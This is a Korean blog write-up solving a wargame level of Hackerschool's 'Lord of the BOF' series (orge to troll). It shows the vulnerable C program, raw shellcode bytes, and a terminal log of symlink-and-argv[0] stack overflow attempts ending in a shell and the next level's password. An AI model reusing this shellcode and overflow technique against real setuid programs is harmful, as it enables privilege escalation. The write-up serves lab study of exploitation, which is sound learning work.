/*
The Lord of the BOF : The Fellowship of the BOF
- troll
- check argc + argv hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
// here is changed
if(argc != 2){
printf("argc must be two!\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
// one more!
memset(argv[1], 0, strlen(argv[1]));
}
egghunter, bufferhunter, argv[1]hunter, \xbf, argc는 반드시 2개
의 조건이 보인다.
argv[0], argv[1] 이 두개를 이용해야하는데, 리턴주소는 argv[1]를 이용할 수 없다. 왜냐? 0으로 초기화되거든
그러면 우리는 argv[0]에다가 shellcode를 넣어줘야 하는데, 우리가 쓰던 기존 shellcode는 사용할 수 없다.
나도 아직 shellcode를 직접 짜보지 않아서.. 자세한 이유는 다음 첨부하는 주소의 글을 참고하길.
https://dokhakdubini.tistory.com/220?category=797537
[해커스쿨 LOB] Level8: Orge >> Troll
Level 8. Orge >> Troll Theme: Check argc + argv hunter 로그인 id : orge pw : timewalker bash2 입력해주시고, 코드를 확인해봅시다. [orge@localhost orge]$ bash2 [orge@localhost orge]$ nl troll.c 1 /*..
dokhakdubini.tistory.com
위 블로그에서 가져온 shell코드는
\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81
총 35바이트의 코드이고, 심볼릭 링크로 지정 가능하다.
[orge@localhost orge]$ ls
core troll troll.c
[orge@localhost orge]$ cp troll.c troop.c
[orge@localhost orge]$ vi troop.c
[1]+ Stopped vi troop.c
[orge@localhost orge]$ vi troop.c
[2]+ Stopped vi troop.c
[orge@localhost orge]$ vi troop.c
[orge@localhost orge]$ ni troop.c
bash2: ni: command not found
[orge@localhost orge]$ ? 코드를 까먹었다 ㅋ
bash2: ?: command not found
[orge@localhost orge]$ ls
core troll troll.c troop.c
[orge@localhost orge]$ gcc -o troop.c
gcc: No input files
[orge@localhost orge]$ gcc -o troop troop.c
[orge@localhost orge]$ ls
core troll troll.c troop troop.c
[orge@localhost orge]$ ln -s troop `python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ ls
core
troll
troll.c
troop
troop.c
????????????????????????????????????????????????????????????????????????????????????????????????????▒?^1ɱ2?l?▒??▒?u▒▒?▒▒▒▒▒2▒Qi00tii0cjo?▒QT?▒?▒?▒?
[orge@localhost orge]$ ./`python -c 'print "\x90"'* `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'`
>
> ''
> '
> '
>
[orge@localhost orge]$
[orge@localhost orge]$ ./`python -c 'print "\x90"'`* `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'`
bffffaa2
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒
Segmentation fault (core dumped)
[orge@localhost orge]$ rm `python -c 'print "\x90"'`*
[orge@localhost orge]$ ls
core troll troll.c troop troop.c
[orge@localhost orge]$ ln -s troll `python -c 'print "\x90"*100 + "
>
>
>
> '
> ''
> '
> '
> '
>
[orge@localhost orge]$ ln -s troll `python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ ls
core
troll
troll.c
troop
troop.c
????????????????????????????????????????????????????????????????????????????????????????????????????▒?^1ɱ2?l?▒??▒?u▒▒?▒▒▒▒▒2▒Qi00tii0cjo?▒QT?▒?▒?▒?
[orge@localhost orge]$ ./`python -c 'print "\x90"'`* `python -c 'print "A"*44 + "\xa2\xfa\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒
bash$ my-pass
euid = 508
aspirin
bash$
근데 코어로 분석을 안할꺼면 굳이 심볼릭링크에 nop을 넣어줘야 하는지 모르겠다.